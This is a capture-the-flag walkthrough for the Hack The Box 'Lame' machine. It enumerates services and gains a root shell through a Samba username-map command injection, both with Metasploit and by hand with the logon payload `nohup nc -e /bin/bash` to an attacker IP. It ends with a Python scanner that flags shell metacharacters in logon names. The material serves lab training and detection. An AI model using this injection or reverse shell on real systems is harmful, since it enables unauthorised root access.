HackTheBox Lame Writeup
HackTheBox is a popular service that offers CTF-like machines to let infosec professionals improve their current skills or learn new ones. HTB Lame is a machine that is often recommended to anyone preparing for the OSCP exam.
This walkthrough contains two different ways of rooting the machine, one with the help of the Metasploit-framework, the other one without.
Information Gathering
First, let's begin with an nmap scan:
sudo nmap -p 1-5000 -sC -sV -v 10.10.10.3
This gives us the following information:
- Port 21: vsFTPd 2.3.4
- Port 22: OpenSSH
- Port 139 and 445: Samba smbd 3.X-4.X
- Port 3632: distccd v1
Let's enumerate the Samba shares using smbmap:
smbmap -H 10.10.10.3
This gives us the following output:
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk      Permissions   Comment
----      -----------   -------
print$    NO ACCESS     Printer Drivers
tmp       READ, WRITE   oh noes!
opt       NO ACCESS
IPC$      NO ACCESS     IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$    NO ACCESS     IPC Service (lame server (Samba 3.0.20-Debian))
We can access the tmp share using smbclient:
smbclient \\\\10.10.10.3\\tmp
but the files on the share do not seem to be interesting or useful.
Next, let's try to enumerate FTP using the anonymous account:
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:user): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,10,3,60,72).
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/"
ftp>
But there is no interesting information here either.
Pwning the machine using Metasploit
First, start Metasploit using msfconsole.
Now you can search for an exploit that matches the running version of Samba:
search Samba 3.0.20
Now either run use 0 or use exploit/multi/samba/usermap_script to load the exploit.
Configure the options:
set RHOSTS 10.10.10.3
set LHOST 10.10.14.4
and start the attack with run.
You will get a reverse shell with root privileges.
Now you can read the root flag in /root/.
To locate the user flag you can use find / -name user.txt -type f 2>/dev/null.
Pwning without Metasploit
To gain root access without the help of Metasploit, connect to the tmp share using smbclient.
Then start a netcat listener (nc -lvnp 4545) and abuse the logon command of smbclient to exploit the machine.
For my exploit, I took a piece of code from this ruby script.
To be more specific, this was my final exploit for HackTheBox Lame:
/=`nohup nc -e /bin/bash 10.10.14.4 4545 `"
which I used together with the logon command:
logon /=`nohup nc -e /bin/bash 10.10.14.4 4545 `"
This spawned a shell with root privileges.
The root flag is located in /root and the user flag can be found with find / -name user.txt -type f 2>/dev/null.
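The logon trick works because this Samba build passes the supplied logon name to a shell through its username map script, which is why a name full of backticks is executed instead of being looked up. From the defender's side, the signal is a session-setup username that carries shell metacharacters. The following is an added example, not part of the original writeup: a small scanner over a constructed, simplified session-setup log format (the `user=`/`from=` layout is assumed for this example, not a real Samba log format) that flags such usernames, using the writeup's own payload as one of the sample lines.

```python
import re
from dataclasses import dataclass

# Constructed sample log (simplified format assumed for this example; not real Samba output).
SAMPLE_LOG = """\
2024-01-01T10:00:00 session setup user=alice from=10.10.14.10
2024-01-01T10:00:05 session setup user=/=`nohup nc -e /bin/bash 10.10.14.4 4545 `" from=10.10.14.4
2024-01-01T10:00:09 session setup user=bob;id from=10.10.14.12
2024-01-01T10:00:12 session setup user=guest from=10.10.14.11
"""

# Shell metacharacters that never belong in a logon name. Because the username
# map script hands the name to /bin/sh, backticks, $(...), ';', '|' and '&' are
# the characters that turn a logon attempt into command execution.
SUSPICIOUS = re.compile(r"[`;|&]|\$\(")
LINE = re.compile(r"^(?P<ts>\S+) session setup user=(?P<user>.*?) from=(?P<src>\S+)$")


@dataclass
class Finding:
    ts: str
    user: str
    src: str
    chars: str  # which metacharacters were seen, for the analyst


def scan_log(text: str) -> list[Finding]:
    """Return every session-setup entry whose username contains shell metacharacters."""
    findings = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # malformed or unrelated line; skip rather than crash
        user = m.group("user")
        hits = "".join(sorted(set(SUSPICIOUS.findall(user))))
        if hits:
            findings.append(Finding(m.group("ts"), user, m.group("src"), hits))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} suspicious logon from {f.src}: chars={f.chars!r} user={f.user!r}")
```

Pair a hit on this check with the Samba version seen in the smbmap banner to decide whether the host is exposed or merely being probed.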
Tags:
htb, lame, hackthebox, samba